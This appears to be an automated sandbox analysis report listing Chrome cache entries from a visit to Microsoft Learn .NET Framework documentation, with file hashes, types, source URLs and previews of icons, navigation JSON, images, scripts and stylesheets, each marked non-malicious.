                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/favicon.ico
                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                Chrome Cache Entry: 206

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):5655
                                                                                Entropy (8bit):4.790648170893192
                                                                                Encrypted:false
                                                                                SSDEEP:96:ogVOjPWccI3aDNjExAjfWQpL0dpwmWMv7BRevy8RJNjvZPyJ2tlh7RewZUZSeZV1:og2cUaDNjESLWQN0dpwm99qllVR7pUZF
                                                                                MD5:D3383426D3B6D3B34CFE726209647339
                                                                                SHA1:E656FAA1B2A5235C9E745C534BC7FB10396484D7
                                                                                SHA-256:6B7B929D611665A1F5EC015EB590FC70BA1F2C6D0D131F5796A53874C0ADFDE2
                                                                                SHA-512:F39A67F02165DB08D31B50FDB21667A286C15B774D3E31FA0ED727DA29BFE7C5C50F691367AC19511660BB38EA9B9F3395C27865AF9A1FB3EA8DD90C15004669
                                                                                Malicious:false
                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"fc6a701829ff5069dcb2f756662cd778bf45c3a3"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                Chrome Cache Entry: 207

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                Category:dropped
                                                                                Size (bytes):17174
                                                                                Entropy (8bit):2.9129715116732746
                                                                                Encrypted:false
                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                Malicious:false
                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                Chrome Cache Entry: 208

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):13842
                                                                                Entropy (8bit):7.802399161550213
                                                                                Encrypted:false
                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                Chrome Cache Entry: 209

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (32271), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):32271
                                                                                Entropy (8bit):4.907357671960936
                                                                                Encrypted:false
                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZjV8din4E9hLAr:5hOEO8chkMet7pCjBfnWOzAr
                                                                                MD5:C21601042134FAA09DB2978E1F0DB0A6
                                                                                SHA1:71252266A222DC1A4AB7223045EDD2158627BCED
                                                                                SHA-256:CB647AFB664CE15C66397C5D95926AC5450EFB6B2AF6AED739660B4E9547AC8C
                                                                                SHA-512:7064A089C04A2BF122B6747CD5BE28A622AD0A92B116564A00EBBD91CA1FF7E1E0576F3F14A17B6C2BA9FA4C6F7F84E8BA050E6091E8535F5F881BE3F28108C8
                                                                                Malicious:false
                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                Chrome Cache Entry: 210

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:downloaded
                                                                                Size (bytes):5655
                                                                                Entropy (8bit):4.790648170893192
                                                                                Encrypted:false
                                                                                SSDEEP:96:ogVOjPWccI3aDNjExAjfWQpL0dpwmWMv7BRevy8RJNjvZPyJ2tlh7RewZUZSeZV1:og2cUaDNjESLWQN0dpwm99qllVR7pUZF
                                                                                MD5:D3383426D3B6D3B34CFE726209647339
                                                                                SHA1:E656FAA1B2A5235C9E745C534BC7FB10396484D7
                                                                                SHA-256:6B7B929D611665A1F5EC015EB590FC70BA1F2C6D0D131F5796A53874C0ADFDE2
                                                                                SHA-512:F39A67F02165DB08D31B50FDB21667A286C15B774D3E31FA0ED727DA29BFE7C5C50F691367AC19511660BB38EA9B9F3395C27865AF9A1FB3EA8DD90C15004669
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"fc6a701829ff5069dcb2f756662cd778bf45c3a3"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                Chrome Cache Entry: 211

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):35005
                                                                                Entropy (8bit):7.980061050467981
                                                                                Encrypted:false
                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                Chrome Cache Entry: 212

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                Category:downloaded
                                                                                Size (bytes):1730619
                                                                                Entropy (8bit):5.505615568287551
                                                                                Encrypted:false
                                                                                SSDEEP:24576:qT7Z3H5dBEhjeaQzyMkinVg8qjC1JcYyOWCzE+0RlCDSB1DkCXWL/Ne2VLE0A96D:qT5H5dBEcDSB1DkCXWLVeuLE0A9CCDa
                                                                                MD5:627F36D1AC50FDA5F78E0A0FC820CCF5
                                                                                SHA1:6962206F8B7B496292205CC0FA6F7620DFD0F64B
                                                                                SHA-256:4AC295B2A0F4EC8169614DAA5A50E719267F85735A1942B13DBD1FAF860FA788
                                                                                SHA-512:1C11E78A5E6B9F0259B2BE495D23403F0A5463C1139ECF39A5D8C3AC40AC0A7E7F903B658180D19FEC6700007A492D5C097A58B0C48E5590F3DE60913F26C42A
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/scripts/en-us/index-docs.js
                                                                                Preview:"use strict";(()=>{var pfe=Object.create;var Fx=Object.defineProperty;var lO=Object.getOwnPropertyDescriptor;var mfe=Object.getOwnPropertyNames;var gfe=Object.getPrototypeOf,ffe=Object.prototype.hasOwnProperty;var hfe=(e,t,o)=>t in e?Fx(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var bfe=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of mfe(t))!ffe.call(e,r)&&r!==o&&Fx(e,r,{get:()=>t[r],enumerable:!(n=lO(t,r))||n.enumerable});return e};var Ra=(e,t,o)=>(o=e!=null?pfe(gfe(e)):{},bfe(t||!e||!e.__esModule?Fx(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?lO(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&Fx(t,o,r),r};var Ui=(e,t,o)=>(hfe(e,typeof t!="symbol"?t+"":t,o),o),_L=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var St=(e,t,o)=>(_L(e,t,"read from private field"),o?o.call(e):t.get(e)),Uo=(e,t,o)=>{if(t.has(

                                                                                Chrome Cache Entry: 213

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:downloaded
                                                                                Size (bytes):4897
                                                                                Entropy (8bit):4.794639101874543
                                                                                Encrypted:false
                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
                                                                                MD5:84E6C95F0E5378BDA94FA965C4692FAF
                                                                                SHA1:7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
                                                                                SHA-256:88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
                                                                                SHA-512:D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

                                                                                Chrome Cache Entry: 214

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):72
                                                                                Entropy (8bit):4.241202481433726
                                                                                Encrypted:false
                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                Malicious:false
                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                Chrome Cache Entry: 215

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1173007
                                                                                Entropy (8bit):5.503893944397598
                                                                                Encrypted:false
                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                Malicious:false
                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                Chrome Cache Entry: 216

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):454994
                                                                                Entropy (8bit):5.075019237036538
                                                                                Encrypted:false
                                                                                SSDEEP:6144:me/PrqKCesH5dFUZHYh6BFPDxZYX04GK7Md:sKCesXFUf
                                                                                MD5:F918712607E51280AB303B0C56150596
                                                                                SHA1:D11D571C001BE2F207AE3F2AAE2173AD79AEEB6A
                                                                                SHA-256:ACD7E9D427C9803635CB731BABF5C82B695B307D9B7F585466C3976773912FA0
                                                                                SHA-512:00F03B292660630A71CA6B75DAB4E18A8882CCCCF7904CEDE0B380C67258391288A7A2E209D8739210F500BD2BBBD4DD61E3CCF816D6DE37E2B1944EDFACF319
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/styles/site-ltr.css
                                                                                Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

                                                                                Chrome Cache Entry: 217

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (32271), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):32271
                                                                                Entropy (8bit):4.907357671960936
                                                                                Encrypted:false
                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZjV8din4E9hLAr:5hOEO8chkMet7pCjBfnWOzAr
                                                                                MD5:C21601042134FAA09DB2978E1F0DB0A6
                                                                                SHA1:71252266A222DC1A4AB7223045EDD2158627BCED
                                                                                SHA-256:CB647AFB664CE15C66397C5D95926AC5450EFB6B2AF6AED739660B4E9547AC8C
                                                                                SHA-512:7064A089C04A2BF122B6747CD5BE28A622AD0A92B116564A00EBBD91CA1FF7E1E0576F3F14A17B6C2BA9FA4C6F7F84E8BA050E6091E8535F5F881BE3F28108C8
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                Chrome Cache Entry: 218

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):35005
                                                                                Entropy (8bit):7.980061050467981
                                                                                Encrypted:false
                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                Chrome Cache Entry: 219

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):13842
                                                                                Entropy (8bit):7.802399161550213
                                                                                Encrypted:false
                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                Chrome Cache Entry: 220

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):4897
                                                                                Entropy (8bit):4.794639101874543
                                                                                Encrypted:false
                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
                                                                                MD5:84E6C95F0E5378BDA94FA965C4692FAF
                                                                                SHA1:7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
                                                                                SHA-256:88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
                                                                                SHA-512:D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
                                                                                Malicious:false
